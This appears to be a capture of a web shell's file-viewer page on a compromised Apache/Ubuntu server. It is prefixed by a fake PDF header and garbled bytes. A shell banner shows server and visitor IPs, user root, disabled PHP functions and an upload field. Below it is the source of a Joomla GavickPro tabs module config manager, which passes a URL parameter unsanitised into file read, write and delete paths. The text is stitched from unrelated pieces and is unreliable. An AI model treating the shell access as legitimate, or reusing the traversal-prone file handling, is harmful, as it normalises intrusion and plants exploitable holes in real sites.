%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
| Server IP : 14.207.165.8 / Your IP : 216.73.216.26 Web Server : Apache/2.4.18 (Ubuntu) System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64 User : root ( 0) PHP Version : 7.0.33-0ubuntu0.16.04.16 Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/thread-self/root/var/www/html/old/modules/mod_tabs_gk5/admin/elements/ |
Upload File : |
<?php
defined('JPATH_BASE') or die;
// Joomla 3.0! compability
if(!defined('DS')){ define('DS',DIRECTORY_SEPARATOR); }
jimport('joomla.form.formfield');
jimport('joomla.filesystem.file');
jimport('joomla.filesystem.folder');
class JFormFieldConfigManager extends JFormField {
protected $type = 'ConfigManager';
protected function getInput() {
jimport('joomla.filesystem.file');
// necessary Joomla! classes
$uri = JURI::getInstance();
$db = JFactory::getDBO();
// variables from URL
$mod_id = $uri->getVar('id', 'none');
$task = $uri->getVar('gk_module_task', 'none');
$file = $uri->getVar('gk_module_file', 'none');
$base_path = str_replace('admin'.DS.'elements', '', dirname(__FILE__)).'config'.DS;
// helping variables
$msg = '';
// if the URL contains proper variables
if($mod_id !== 'none' && is_numeric($mod_id) && $task !== 'none') {
if($task == 'load') {
if(JFile::exists($base_path . $file)) {
//
$query = '
UPDATE
#__modules
SET
params = '.$db->quote(file_get_contents($base_path . $file)).'
WHERE
id = '.$mod_id.'
LIMIT 1
';
// Executing SQL Query
$db->setQuery($query);
$result = $db->query();
// check the result
if($result) {
$msg = '<div class="gk_ok">'.JText::_('MOD_TABS_GK5_CONFIG_LOADED_AND_SAVED').'</div>';
} else {
$msg = '<div class="gk_error">'.JText::_('MOD_TABS_GK5_CONFIG_SQL_ERROR').'</div>';
}
} else {
$msg = '<div class="gk_error">'.JText::_('MOD_TABS_GK5_CONFIG_SELECTED_FILE_DOESNT_EXIST').'</div>';
}
} else if($task == 'save') {
if($file == '') {
$file = date('d_m_Y_h_s');
}
// variable used to detect if the specified file exists
$i = 0;
// check if the file to save doesn't exist
if(JFile::exists($base_path . $file . '.json')) {
// find the proper name for the file by incrementing
$i = 1;
while(JFile::exists($base_path . $file . $i . '.json')) { $i++; }
}
// get the settings from the database
$query = '
SELECT
params AS params
FROM
#__modules
WHERE
id = '.$mod_id.'
LIMIT 1
';
// Executing SQL Query
$db->setQuery($query);
$row = $db->loadObject();
// write it
if(JFile::write($base_path . $file . (($i != 0) ? $i : '') . '.json' , $row->params)) {
if($i == 0) {
$msg = '<div class="gk_ok">'.JText::_('MOD_TABS_GK5_CONFIG_FILE_SAVED_AS'). ' '. $file .'.json</div>';
} else {
$msg = '<div class="gk_ok">'.JText::_('MOD_TABS_GK5_CONFIG_FILE_SAVED_AS'). ' '. $file . $i .'.json</div>';
}
} else {
$msg = '<div class="gk_error">'.JText::_('MOD_TABS_GK5_CONFIG_FILE_WASNT_SAVED_PLEASE_CHECK_PERM') .'</div>';
}
// Delete Function
} else if($task == 'delete') {
// Check if file exists before deleting
if(JFile::exists($base_path . $file)) {
if(JFile::delete($base_path . $file)) {
$msg = '<div class="gk_ok">'. $file . ' ' . JText::_('MOD_TABS_GK5_CONFIG_FILE_DELETED_AS') .'</div>';
} else {
$msg = '<div class="gk_error">'. $file . ' ' . JText::_('MOD_TABS_GK5_CONFIG_FILE_WASNT_DELETED_PLEASE_CHECK_PERM') .'</div>';
}
} else {
$msg = '<div class="gk_error">'. $file . ' ' . JText::_('MOD_TABS_GK5_CONFIG_FILE_WASNT_DELETED_PLEASE_CHECK_FILE') .'</div>';
}
}
}
// generate the select list
$options = (array) $this->getOptions();
$file_select = JHtml::_('select.genericlist', $options, 'name', '', 'value', 'text', 'default', 'config_manager_load_filename');
$file_delete = JHtml::_('select.genericlist', $options, 'name', '', 'value', 'text', 'default', 'config_manager_delete_filename');
// return the standard formfield output
$html = '';
$html .= '<div id="gk-social"><span>Follow us on the social media: </span> <iframe src="//www.facebook.com/plugins/like.php?href=http%3A%2F%2Ffacebook.com%2Fgavickpro&send=false&layout=button_count&width=150&show_faces=false&font=arial&colorscheme=light&action=like&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:21px;" allowTransparency="true"></iframe> <a href="https://twitter.com/gavickpro" class="twitter-follow-button" data-show-count="false">Follow @gavickpro</a><script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?\'http\':\'https\';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+\'://platform.twitter.com/widgets.js\';fjs.parentNode.insertBefore(js,fjs);}}(document, \'script\', \'twitter-wjs\');</script></div>';
$html .= '<div id="config_manager_form">';
$html .= $msg;
$html .= '<div><label>'.JText::_('MOD_TABS_GK5_CONFIG_LOAD').' </label>'.$file_select.'<button class="btn" id="config_manager_load"><i class="icon-download"></i>'.JText::_('MOD_TABS_GK5_CONFIG_LOAD_BTN').' </button></div>';
$html .= '<div><label>'.JText::_('MOD_TABS_GK5_CONFIG_SAVE').' </label><div class="input-append"><input type="text" id="config_manager_save_filename" /><span class="add-on">.json</span></div><button class="btn" id="config_manager_save"><i class="icon-upload"></i>'.JText::_('MOD_TABS_GK5_CONFIG_SAVE_BTN').'</button></div>';
$html .= '<div><label>'.JText::_('MOD_TABS_GK5_CONFIG_DELETE').' </label>'.$file_delete.'<button class="btn" id="config_manager_delete"><i class="icon-remove"></i>'.JText::_('MOD_TABS_GK5_CONFIG_DELETE_BTN').'</button></div>';
$html .= '<div><span class="label label-warning"> '.JText::_('MOD_TABS_GK4_CONFIG_DIRECTORY').'</span><span class="label">'.$base_path.'</span></div>';
$html .= '</div>';
// finish the output
return $html;
}
protected function getOptions() {
$options = array();
$path = (string) $this->element['directory'];
if (!is_dir($path)) $path = JPATH_ROOT.DS.$path;
$files = JFolder::files($path, '.json');
if (is_array($files)) {
foreach($files as $file) {
$options[] = JHtml::_('select.option', $file, $file);
}
}
return array_merge($options);
}
}
/* EOF */